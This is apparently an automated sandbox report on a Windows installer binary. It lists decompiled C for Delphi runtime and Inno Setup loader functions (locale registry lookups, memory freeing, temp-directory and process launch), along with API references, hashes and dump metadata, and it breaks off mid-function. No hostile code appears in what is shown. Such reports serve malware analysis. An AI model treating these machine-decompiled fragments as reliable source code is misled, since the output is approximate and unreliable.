                                                                    0x0040aca9
                                                                    0x0040aca9
                                                                    0x0040acfd
                                                                    0x0040ad00
                                                                    0x0040ad03
                                                                    0x0040ad0c
                                                                    0x0040ad11
                                                                    0x0040ad11
                                                                    0x0040ad1f
                                                                    0x0040aba7
                                                                    0x0040abbc
                                                                    0x0040abc3
                                                                    0x00000000
                                                                    0x0040abc5
                                                                    0x0040abda
                                                                    0x0040abe1
                                                                    0x00000000
                                                                    0x0040abe3
                                                                    0x0040abf8
                                                                    0x0040abff
                                                                    0x00000000
                                                                    0x0040ac01
                                                                    0x0040ac16
                                                                    0x0040ac1d
                                                                    0x00000000
                                                                    0x0040ac1f
                                                                    0x0040ac34
                                                                    0x0040ac3b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040ac3b
                                                                    0x0040ac1d
                                                                    0x0040abff
                                                                    0x0040abe1
                                                                    0x0040abc3
                                                                    0x0040aba1

                                                                    APIs
                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040AD3D,?,?), ref: 0040AB51
                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040AD3D,?,?), ref: 0040AB9A
                                                                    • RegOpenKeyExW.ADVAPI32(80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040AD3D,?,?), ref: 0040ABBC
                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000), ref: 0040ABDA
                                                                    • RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001), ref: 0040ABF8
                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002), ref: 0040AC16
                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 0040AC34
                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,0040AD20,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040AD3D), ref: 0040AC74
                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,0040AD20,?,80000001), ref: 0040AC9F
                                                                    • RegCloseKey.ADVAPI32(?,0040AD27,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,0040AD20,?,80000001,Software\Embarcadero\Locales), ref: 0040AD1A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.337211101.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000C.00000002.337202126.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337302256.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337318415.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337329206.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337338314.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Open$QueryValue$CloseFileModuleName
                                                                    • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
                                                                    • API String ID: 2701450724-3496071916
                                                                    • Opcode ID: 8af598c5208afc10239ec938650b713086258bd8f52ea94da89803fd33d180c8
                                                                    • Instruction ID: cdbeddac4db4dda9279672c2614f8dce2a18b15a4a55f9a64fe791b6da82c449
                                                                    • Opcode Fuzzy Hash: 8af598c5208afc10239ec938650b713086258bd8f52ea94da89803fd33d180c8
                                                                    • Instruction Fuzzy Hash: FB514371A80308BEEB10DA95CC46FAE77BCEB08709F504477BA04F75C1D6B8AA50975E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004B63A1, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 103COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 85%
                                                                    			E004B63A1(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				intOrPtr _t17;
				struct HWND__* _t21;
				struct HWND__* _t22;
				struct HWND__* _t25;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr _t36;
				intOrPtr _t39;
				int _t40;
				intOrPtr _t41;
				intOrPtr _t43;
				struct HWND__* _t46;
				intOrPtr _t47;
				intOrPtr _t50;
				intOrPtr _t60;
				intOrPtr _t62;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t70;
				void* _t73;
				void* _t74;

				_t74 = __eflags;
				_t72 = __esi;
				_t71 = __edi;
				_t52 = __ebx;
				_pop(_t62);
				 *[fs:eax] = _t62;
				_t17 =  *0x4c1d88; // 0x0
				 *0x4c1d88 = 0;
				E00405CE8(_t17);
				_t21 = E0040E450(0, L"STATIC", 0,  *0x4be634, 0, 0, 0, 0, 0, 0, 0); // executed
				 *0x4ba450 = _t21;
				_t22 =  *0x4ba450; // 0x70264
				 *0x4c1d80 = SetWindowLongW(_t22, 0xfffffffc, E004AF69C);
				_t25 =  *0x4ba450; // 0x70264
				 *(_t73 - 0x58) = _t25;
				 *((char*)(_t73 - 0x54)) = 0;
				_t26 =  *0x4c1d90; // 0x4f677c
				_t4 = _t26 + 0x20; // 0x4c529c
				 *((intOrPtr*)(_t73 - 0x50)) =  *_t4;
				 *((char*)(_t73 - 0x4c)) = 0;
				_t28 =  *0x4c1d90; // 0x4f677c
				_t7 = _t28 + 0x24; // 0xea800
				 *((intOrPtr*)(_t73 - 0x48)) =  *_t7;
				 *((char*)(_t73 - 0x44)) = 0;
				E0041A87C(L"/SL5=\"$%x,%d,%d,", 2, _t73 - 0x58, _t73 - 0x40);
				_push( *((intOrPtr*)(_t73 - 0x40)));
				_push( *0x4c1d84);
				_push(0x4b6680);
				E00422BC4(_t73 - 0x5c, __ebx, __esi, _t74);
				_push( *((intOrPtr*)(_t73 - 0x5c)));
				E004087C4(_t73 - 0x3c, __ebx, 4, __edi, __esi);
				_t36 =  *0x4c1d9c; // 0x0, executed
				E004AF728(_t36, _t52, 0x4ba44c,  *((intOrPtr*)(_t73 - 0x3c)), _t71, _t72, __fp0); // executed
				if( *0x4ba448 != 0xffffffff) {
					_t50 =  *0x4ba448; // 0x0
					E004AF60C(_t50);
				}
				_pop(_t68);
				 *[fs:eax] = _t68;
				_push(E004B6554);
				_t39 =  *0x4c1d88; // 0x0
				_t40 = E00405CE8(_t39);
				if( *0x4c1d9c != 0) {
					_t70 =  *0x4c1d9c; // 0x0
					_t40 = E004AF1B4(0, _t70, 0xfa, 0x32); // executed
				}
				if( *0x4c1d94 != 0) {
					_t47 =  *0x4c1d94; // 0x0
					_t40 = RemoveDirectoryW(E004084EC(_t47)); // executed
				}
				if( *0x4ba450 != 0) {
					_t46 =  *0x4ba450; // 0x70264
					_t40 = DestroyWindow(_t46); // executed
				}
				if( *0x4c1d78 != 0) {
					_t41 =  *0x4c1d78; // 0x0
					_t60 =  *0x4c1d7c; // 0x1
					_t69 =  *0x426bb0; // 0x426bb4
					E00408D08(_t41, _t60, _t69);
					_t43 =  *0x4c1d78; // 0x0
					E0040540C(_t43);
					 *0x4c1d78 = 0;
					return 0;
				}
				return _t40;
			}
























                                                                    0x004b63a1
                                                                    0x004b63a1
                                                                    0x004b63a1
                                                                    0x004b63a1
                                                                    0x004b63a3
                                                                    0x004b63a6
                                                                    0x004b63d3
                                                                    0x004b63da
                                                                    0x004b63e0
                                                                    0x004b6407
                                                                    0x004b640c
                                                                    0x004b6418
                                                                    0x004b6423
                                                                    0x004b642c
                                                                    0x004b6431
                                                                    0x004b6434
                                                                    0x004b6438
                                                                    0x004b643d
                                                                    0x004b6440
                                                                    0x004b6443
                                                                    0x004b6447
                                                                    0x004b644c
                                                                    0x004b644f
                                                                    0x004b6452
                                                                    0x004b6463
                                                                    0x004b6468
                                                                    0x004b646b
                                                                    0x004b6471
                                                                    0x004b6479
                                                                    0x004b647e
                                                                    0x004b6489
                                                                    0x004b6496
                                                                    0x004b649b
                                                                    0x004b64a7
                                                                    0x004b64a9
                                                                    0x004b64ae
                                                                    0x004b64ae
                                                                    0x004b64b5
                                                                    0x004b64b8
                                                                    0x004b64bb
                                                                    0x004b64c0
                                                                    0x004b64c5
                                                                    0x004b64d1
                                                                    0x004b64df
                                                                    0x004b64e7
                                                                    0x004b64e7
                                                                    0x004b64f3
                                                                    0x004b64f5
                                                                    0x004b6500
                                                                    0x004b6500
                                                                    0x004b650c
                                                                    0x004b650e
                                                                    0x004b6514
                                                                    0x004b6514
                                                                    0x004b6520
                                                                    0x004b6522
                                                                    0x004b6527
                                                                    0x004b652d
                                                                    0x004b6533
                                                                    0x004b6538
                                                                    0x004b653d
                                                                    0x004b6544
                                                                    0x00000000
                                                                    0x004b6544
                                                                    0x004b6549

                                                                    APIs
                                                                      • Part of subcall function 0040E450: CreateWindowExW.USER32 ref: 0040E48F
                                                                    • SetWindowLongW.USER32 ref: 004B641E
                                                                      • Part of subcall function 00422BC4: GetCommandLineW.KERNEL32(00000000,00422C06,?,?,00000000,?,004B647E,004B6680,?), ref: 00422BDA
                                                                      • Part of subcall function 004AF728: CreateProcessW.KERNEL32 ref: 004AF798
                                                                      • Part of subcall function 004AF728: CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,004AF82C,00000000,004AF81C,00000000), ref: 004AF7AE
                                                                      • Part of subcall function 004AF728: MsgWaitForMultipleObjects.USER32 ref: 004AF7C7
                                                                      • Part of subcall function 004AF728: GetExitCodeProcess.KERNEL32 ref: 004AF7DB
                                                                      • Part of subcall function 004AF728: CloseHandle.KERNEL32(?,?,004BA44C,00000001,?,00000000,000000FF,000004FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004AF7E4
                                                                    • RemoveDirectoryW.KERNEL32(00000000,004B6554), ref: 004B6500
                                                                    • DestroyWindow.USER32(00070264,004B6554), ref: 004B6514
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.337211101.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000C.00000002.337202126.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337302256.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337318415.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337329206.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337338314.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Window$CloseCreateHandleProcess$CodeCommandDestroyDirectoryExitLineLongMultipleObjectsRemoveWait
                                                                    • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC$|gO
                                                                    • API String ID: 3586484885-1461680330
                                                                    • Opcode ID: 3c021837c984efc67f9ad3a794955b0d04b23bc85077f6812c73bb0a86195aee
                                                                    • Instruction ID: 04c90e22d0408fd8de4b79ff2beaee59f7a3a861a1d73b16261182ae62401715
                                                                    • Opcode Fuzzy Hash: 3c021837c984efc67f9ad3a794955b0d04b23bc85077f6812c73bb0a86195aee
                                                                    • Instruction Fuzzy Hash: EC416B74A002009FE754EBA9EC85B9A37B4EB85308F11453BE0059B2B6CB7CA851CB5D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040426C, Relevance: 12.2, APIs: 8, Instructions: 221sleepCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 91%
                                                                    			E0040426C(void* __eax, signed int __edi, void* __ebp) {
				struct _MEMORY_BASIC_INFORMATION _v44;
				void* _v48;
				signed int __ebx;
				void* _t58;
				signed int _t61;
				int _t65;
				signed int _t67;
				void _t70;
				int _t71;
				signed int _t78;
				void* _t79;
				signed int _t81;
				intOrPtr _t82;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				signed int _t92;
				void* _t96;
				signed int _t99;
				void* _t103;
				intOrPtr _t104;
				void* _t106;
				void* _t108;
				signed int _t113;
				void* _t115;
				void* _t116;

				_t56 = __eax;
				_t89 =  *(__eax - 4);
				_t78 =  *0x4bb059; // 0x0
				if((_t89 & 0x00000007) != 0) {
					__eflags = _t89 & 0x00000005;
					if((_t89 & 0x00000005) != 0) {
						_pop(_t78);
						__eflags = _t89 & 0x00000003;
						if((_t89 & 0x00000003) == 0) {
							_push(_t78);
							_push(__edi);
							_t116 = _t115 + 0xffffffdc;
							_t103 = __eax - 0x10;
							E00403C48();
							_t58 = _t103;
							 *_t116 =  *_t58;
							_v48 =  *((intOrPtr*)(_t58 + 4));
							_t92 =  *(_t58 + 0xc);
							if((_t92 & 0x00000008) != 0) {
								_t79 = _t103;
								_t113 = _t92 & 0xfffffff0;
								_t99 = 0;
								__eflags = 0;
								while(1) {
									VirtualQuery(_t79,  &_v44, 0x1c);
									_t61 = VirtualFree(_t79, 0, 0x8000);
									__eflags = _t61;
									if(_t61 == 0) {
										_t99 = _t99 | 0xffffffff;
										goto L10;
									}
									_t104 = _v44.RegionSize;
									__eflags = _t113 - _t104;
									if(_t113 > _t104) {
										_t113 = _t113 - _t104;
										_t79 = _t79 + _t104;
										continue;
									}
									goto L10;
								}
							} else {
								_t65 = VirtualFree(_t103, 0, 0x8000); // executed
								if(_t65 == 0) {
									_t99 = __edi | 0xffffffff;
								} else {
									_t99 = 0;
								}
							}
							L10:
							if(_t99 == 0) {
								 *_v48 =  *_t116;
								 *( *_t116 + 4) = _v48;
							}
							 *0x4bdb78 = 0;
							return _t99;
						} else {
							return 0xffffffff;
						}
					} else {
						goto L31;
					}
				} else {
					__eflags = __bl;
					__ebx =  *__edx;
					if(__eflags != 0) {
						while(1) {
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__eflags == 0) {
								goto L14;
							}
							asm("pause");
							__eflags =  *0x4bb989;
							if(__eflags != 0) {
								continue;
							} else {
								Sleep(0);
								__edx = __edx;
								__ecx = __ecx;
								__eax = 0x100;
								asm("lock cmpxchg [ebx], ah");
								if(__eflags != 0) {
									Sleep(0xa);
									__edx = __edx;
									__ecx = __ecx;
									continue;
								}
							}
							goto L14;
						}
					}
					L14:
					_t14 = __edx + 0x14;
					 *_t14 =  *(__edx + 0x14) - 1;
					__eflags =  *_t14;
					__eax =  *(__edx + 0x10);
					if( *_t14 == 0) {
						__eflags = __eax;
						if(__eax == 0) {
							L20:
							 *(__ebx + 0x14) = __eax;
						} else {
							__eax =  *(__edx + 0xc);
							__ecx =  *(__edx + 8);
							 *(__eax + 8) = __ecx;
							 *(__ecx + 0xc) = __eax;
							__eax = 0;
							__eflags =  *((intOrPtr*)(__ebx + 0x18)) - __edx;
							if( *((intOrPtr*)(__ebx + 0x18)) == __edx) {
								goto L20;
							}
						}
						 *__ebx = __al;
						__eax = __edx;
						__edx =  *(__edx - 4);
						__bl =  *0x4bb059; // 0x0
						L31:
						__eflags = _t78;
						_t81 = _t89 & 0xfffffff0;
						_push(_t101);
						_t106 = _t56;
						if(__eflags != 0) {
							while(1) {
								_t67 = 0x100;
								asm("lock cmpxchg [0x4bbae8], ah");
								if(__eflags == 0) {
									goto L32;
								}
								asm("pause");
								__eflags =  *0x4bb989;
								if(__eflags != 0) {
									continue;
								} else {
									Sleep(0);
									_t67 = 0x100;
									asm("lock cmpxchg [0x4bbae8], ah");
									if(__eflags != 0) {
										Sleep(0xa);
										continue;
									}
								}
								goto L32;
							}
						}
						L32:
						__eflags = (_t106 - 4)[_t81] & 0x00000001;
						_t87 = (_t106 - 4)[_t81];
						if(((_t106 - 4)[_t81] & 0x00000001) != 0) {
							_t67 = _t81 + _t106;
							_t88 = _t87 & 0xfffffff0;
							_t81 = _t81 + _t88;
							__eflags = _t88 - 0xb30;
							if(_t88 >= 0xb30) {
								_t67 = E00403AC0(_t67);
							}
						} else {
							_t88 = _t87 | 0x00000008;
							__eflags = _t88;
							(_t106 - 4)[_t81] = _t88;
						}
						__eflags =  *(_t106 - 4) & 0x00000008;
						if(( *(_t106 - 4) & 0x00000008) != 0) {
							_t88 =  *(_t106 - 8);
							_t106 = _t106 - _t88;
							_t81 = _t81 + _t88;
							__eflags = _t88 - 0xb30;
							if(_t88 >= 0xb30) {
								_t67 = E00403AC0(_t106);
							}
						}
						__eflags = _t81 - 0x13ffe0;
						if(_t81 == 0x13ffe0) {
							__eflags =  *0x4bbaf0 - 0x13ffe0;
							if( *0x4bbaf0 != 0x13ffe0) {
								_t82 = _t106 + 0x13ffe0;
								E00403B60(_t67);
								 *((intOrPtr*)(_t82 - 4)) = 2;
								 *0x4bbaf0 = 0x13ffe0;
								 *0x4bbaec = _t82;
								 *0x4bbae8 = 0;
								__eflags = 0;
								return 0;
							} else {
								_t108 = _t106 - 0x10;
								_t70 =  *_t108;
								_t96 =  *(_t108 + 4);
								 *(_t70 + 4) = _t96;
								 *_t96 = _t70;
								 *0x4bbae8 = 0;
								_t71 = VirtualFree(_t108, 0, 0x8000);
								__eflags = _t71 - 1;
								asm("sbb eax, eax");
								return _t71;
							}
						} else {
							 *(_t106 - 4) = _t81 + 3;
							 *(_t106 - 8 + _t81) = _t81;
							E00403B00(_t106, _t88, _t81);
							 *0x4bbae8 = 0;
							__eflags = 0;
							return 0;
						}
					} else {
						__eflags = __eax;
						 *(__edx + 0x10) = __ecx;
						 *(__ecx - 4) = __eax;
						if(__eflags == 0) {
							__ecx =  *(__ebx + 8);
							 *(__edx + 0xc) = __ebx;
							 *(__edx + 8) = __ecx;
							 *(__ecx + 0xc) = __edx;
							 *(__ebx + 8) = __edx;
							 *__ebx = 0;
							__eax = 0;
							__eflags = 0;
							_pop(__ebx);
							return 0;
						} else {
							__eax = 0;
							__eflags = 0;
							 *__ebx = __al;
							_pop(__ebx);
							return 0;
						}
					}
				}
			}





























                                                                    0x0040426c
                                                                    0x0040426c
                                                                    0x00404275
                                                                    0x0040427b
                                                                    0x00404364
                                                                    0x00404367
                                                                    0x00404454
                                                                    0x00404455
                                                                    0x00404458
                                                                    0x00403cf8
                                                                    0x00403cfa
                                                                    0x00403cfc
                                                                    0x00403d01
                                                                    0x00403d04
                                                                    0x00403d09
                                                                    0x00403d0d
                                                                    0x00403d13
                                                                    0x00403d17
                                                                    0x00403d1d
                                                                    0x00403d39
                                                                    0x00403d3d
                                                                    0x00403d40
                                                                    0x00403d40
                                                                    0x00403d42
                                                                    0x00403d4a
                                                                    0x00403d57
                                                                    0x00403d5c
                                                                    0x00403d5e
                                                                    0x00403d60
                                                                    0x00403d63
                                                                    0x00403d63
                                                                    0x00403d65
                                                                    0x00403d69
                                                                    0x00403d6b
                                                                    0x00403d6d
                                                                    0x00403d6f
                                                                    0x00000000
                                                                    0x00403d6f
                                                                    0x00000000
                                                                    0x00403d6b
                                                                    0x00403d1f
                                                                    0x00403d27
                                                                    0x00403d2e
                                                                    0x00403d34
                                                                    0x00403d30
                                                                    0x00403d30
                                                                    0x00403d30
                                                                    0x00403d2e
                                                                    0x00403d73
                                                                    0x00403d75
                                                                    0x00403d7e
                                                                    0x00403d87
                                                                    0x00403d87
                                                                    0x00403d8a
                                                                    0x00403d9a
                                                                    0x0040445e
                                                                    0x00404463
                                                                    0x00404463
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00404281
                                                                    0x00404281
                                                                    0x00404283
                                                                    0x00404285
                                                                    0x004042e8
                                                                    0x004042e8
                                                                    0x004042ed
                                                                    0x004042f1
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004042f3
                                                                    0x004042f5
                                                                    0x004042fc
                                                                    0x00000000
                                                                    0x004042fe
                                                                    0x00404302
                                                                    0x00404307
                                                                    0x00404308
                                                                    0x00404309
                                                                    0x0040430e
                                                                    0x00404312
                                                                    0x0040431c
                                                                    0x00404321
                                                                    0x00404322
                                                                    0x00000000
                                                                    0x00404322
                                                                    0x00404312
                                                                    0x00000000
                                                                    0x004042fc
                                                                    0x004042e8
                                                                    0x00404287
                                                                    0x00404287
                                                                    0x00404287
                                                                    0x00404287
                                                                    0x0040428b
                                                                    0x0040428e
                                                                    0x004042bc
                                                                    0x004042be
                                                                    0x004042d3
                                                                    0x004042d3
                                                                    0x004042c0
                                                                    0x004042c0
                                                                    0x004042c3
                                                                    0x004042c6
                                                                    0x004042c9
                                                                    0x004042cc
                                                                    0x004042ce
                                                                    0x004042d1
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004042d1
                                                                    0x004042d6
                                                                    0x004042d8
                                                                    0x004042da
                                                                    0x004042dd
                                                                    0x0040436d
                                                                    0x00404370
                                                                    0x00404372
                                                                    0x00404374
                                                                    0x00404375
                                                                    0x00404377
                                                                    0x00404328
                                                                    0x00404328
                                                                    0x0040432d
                                                                    0x00404335
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00404337
                                                                    0x00404339
                                                                    0x00404340
                                                                    0x00000000
                                                                    0x00404342
                                                                    0x00404344
                                                                    0x00404349
                                                                    0x0040434e
                                                                    0x00404356
                                                                    0x0040435a
                                                                    0x00000000
                                                                    0x0040435a
                                                                    0x00404356
                                                                    0x00000000
                                                                    0x00404340
                                                                    0x00404328
                                                                    0x00404379
                                                                    0x00404379
                                                                    0x00404381
                                                                    0x00404385
                                                                    0x004043bc
                                                                    0x004043bf
                                                                    0x004043c2
                                                                    0x004043c4
                                                                    0x004043ca
                                                                    0x004043cc
                                                                    0x004043cc
                                                                    0x00404387
                                                                    0x00404387
                                                                    0x00404387
                                                                    0x0040438a
                                                                    0x0040438a
                                                                    0x0040438e
                                                                    0x00404392
                                                                    0x004043d4
                                                                    0x004043d7
                                                                    0x004043d9
                                                                    0x004043db
                                                                    0x004043e1
                                                                    0x004043e5
                                                                    0x004043e5
                                                                    0x004043e1
                                                                    0x00404394
                                                                    0x0040439a
                                                                    0x004043ec
                                                                    0x004043f6
                                                                    0x00404424
                                                                    0x0040442a
                                                                    0x0040442f
                                                                    0x00404436
                                                                    0x00404440
                                                                    0x00404446
                                                                    0x0040444d
                                                                    0x00404451
                                                                    0x004043f8
                                                                    0x004043f8
                                                                    0x004043fb
                                                                    0x004043fd
                                                                    0x00404400
                                                                    0x00404403
                                                                    0x00404405
                                                                    0x00404414
                                                                    0x00404419
                                                                    0x0040441c
                                                                    0x00404420
                                                                    0x00404420
                                                                    0x0040439c
                                                                    0x0040439f
                                                                    0x004043a2
                                                                    0x004043aa
                                                                    0x004043af
                                                                    0x004043b6
                                                                    0x004043ba
                                                                    0x004043ba
                                                                    0x00404290
                                                                    0x00404290
                                                                    0x00404292
                                                                    0x00404298
                                                                    0x0040429b
                                                                    0x004042a4
                                                                    0x004042a7
                                                                    0x004042aa
                                                                    0x004042ad
                                                                    0x004042b0
                                                                    0x004042b3
                                                                    0x004042b6
                                                                    0x004042b6
                                                                    0x004042b8
                                                                    0x004042b9
                                                                    0x0040429d
                                                                    0x0040429d
                                                                    0x0040429d
                                                                    0x0040429f
                                                                    0x004042a1
                                                                    0x004042a2
                                                                    0x004042a2
                                                                    0x0040429b
                                                                    0x0040428e

                                                                    APIs
                                                                    • Sleep.KERNEL32(00000000,?,?,00000000,0040BB40,0040BBA6,?,00000000,?,?,0040BEC9,00000000,?,00000000,0040C3CA,00000000), ref: 00404302
                                                                    • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,0040BB40,0040BBA6,?,00000000,?,?,0040BEC9,00000000,?,00000000,0040C3CA), ref: 0040431C
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.337211101.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000C.00000002.337202126.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337302256.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337318415.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337329206.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337338314.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID:
                                                                    • API String ID: 3472027048-0
                                                                    • Opcode ID: bb44cecb062a42ab294f9ebbddb74143d6ecf503913ace061e42b720e5e9e313
                                                                    • Instruction ID: daf3465a9571387f72e828d046180f4ce70f3b260d456b91f151aa63c4646fa2
                                                                    • Opcode Fuzzy Hash: bb44cecb062a42ab294f9ebbddb74143d6ecf503913ace061e42b720e5e9e313
                                                                    • Instruction Fuzzy Hash: AA71E2B17042008BD715DF29CC84B16BBD8AF85715F2482BFE984AB3D2D7B899418789
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004B60E8, Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 165windowCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 75%
                                                                    			E004B60E8(void* __ebx, void* __edi, void* __esi, void* __fp0) {
				intOrPtr _t26;
				intOrPtr _t31;
				intOrPtr _t37;
				intOrPtr _t38;
				intOrPtr _t42;
				intOrPtr _t44;
				intOrPtr _t47;
				intOrPtr _t51;
				intOrPtr _t53;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t59;
				intOrPtr _t61;
				WCHAR* _t63;
				intOrPtr _t69;
				intOrPtr _t74;
				int _t75;
				intOrPtr _t76;
				intOrPtr _t78;
				struct HWND__* _t81;
				intOrPtr _t82;
				intOrPtr _t86;
				void* _t90;
				intOrPtr _t93;
				intOrPtr _t99;
				intOrPtr _t101;
				intOrPtr _t107;
				intOrPtr _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				void* _t120;
				intOrPtr _t121;

				_t119 = __esi;
				_t118 = __edi;
				_t85 = __ebx;
				_pop(_t101);
				_pop(_t88);
				 *[fs:eax] = _t101;
				E004AF678(_t88);
				if( *0x4ba440 == 0) {
					if(( *0x4c1d71 & 0x00000001) == 0 &&  *0x4ba441 == 0) {
						_t61 =  *0x4ba674; // 0x4c0d0c
						_t4 = _t61 + 0x2f8; // 0x0
						_t63 = E004084EC( *_t4);
						_t88 = _t120 - 0x28;
						_t101 =  *0x4c1c48; // 0x0
						E00426F08(0xc2, _t120 - 0x28, _t101);
						if(MessageBoxW(0, E004084EC( *((intOrPtr*)(_t120 - 0x28))), _t63, 0x24) != 6) {
							 *0x4ba44c = 2;
							E0041F238();
						}
					}
					E004056D0();
					E004AEFE8(_t120 - 0x2c, _t85, _t101, _t118, _t119); // executed
					E00407E00(0x4c1d94,  *((intOrPtr*)(_t120 - 0x2c)));
					_t26 =  *0x4c1d84; // 0x0
					E00422954(_t26, _t88, _t120 - 0x34);
					E004226C8( *((intOrPtr*)(_t120 - 0x34)), _t85, _t120 - 0x30, L".tmp", _t118, _t119);
					_push( *((intOrPtr*)(_t120 - 0x30)));
					_t31 =  *0x4c1d94; // 0x0
					E00422660(_t31, _t120 - 0x38);
					_pop(_t90);
					E0040873C(0x4c1d98, _t90,  *((intOrPtr*)(_t120 - 0x38)));
					_t107 =  *0x4c1d98; // 0x0
					E00407E00(0x4c1d9c, _t107);
					_t37 =  *0x4c1d90; // 0x4f677c
					_t15 = _t37 + 0x14; // 0x4cbe4a
					_t38 =  *0x4c1d88; // 0x0
					E00423CE8(_t38,  *_t15);
					_push(_t120);
					_push(0x4b63ab);
					_push( *[fs:edx]);
					 *[fs:edx] = _t121;
					 *0x4c1de0 = 0;
					_t42 = E00423D00(1, 0, 1, 0); // executed
					 *0x4c1d8c = _t42;
					_push(_t120);
					_push(0x4b639a);
					_push( *[fs:eax]);
					 *[fs:eax] = _t121;
					_t44 =  *0x4c1d90; // 0x4f677c
					_t16 = _t44 + 0x18; // 0x323c00
					 *0x4c1de0 = E004053F0( *_t16);
					_t47 =  *0x4c1d90; // 0x4f677c
					_t17 = _t47 + 0x18; // 0x323c00
					_t86 =  *0x4c1de0; // 0x7fb80010
					E00405884(_t86,  *_t17);
					_push(_t120);
					_push(0x4b62e9);
					_push( *[fs:eax]);
					 *[fs:eax] = _t121;
					_t51 =  *0x424cd8; // 0x424d30
					_t93 =  *0x4c1d88; // 0x0
					_t53 = E00424748(_t93, 1, _t51); // executed
					 *0x4c1de4 = _t53;
					_push(_t120);
					_push(0x4b62d8);
					_push( *[fs:eax]);
					 *[fs:eax] = _t121;
					_t55 =  *0x4c1d90; // 0x4f677c
					_t18 = _t55 + 0x18; // 0x323c00
					_t56 =  *0x4c1de4; // 0x22369d0
					E00424A24(_t56,  *_t18, _t86);
					_pop(_t114);
					 *[fs:eax] = _t114;
					_push(E004B62DF);
					_t59 =  *0x4c1de4; // 0x22369d0
					return E00405CE8(_t59);
				} else {
					_t69 =  *0x4ba674; // 0x4c0d0c
					_t1 = _t69 + 0x1d0; // 0x0
					E004AFA44( *_t1, __ebx, __edi, __esi);
					 *0x4ba44c = 0;
					_pop(_t115);
					 *[fs:eax] = _t115;
					_push(E004B6554);
					_t74 =  *0x4c1d88; // 0x0
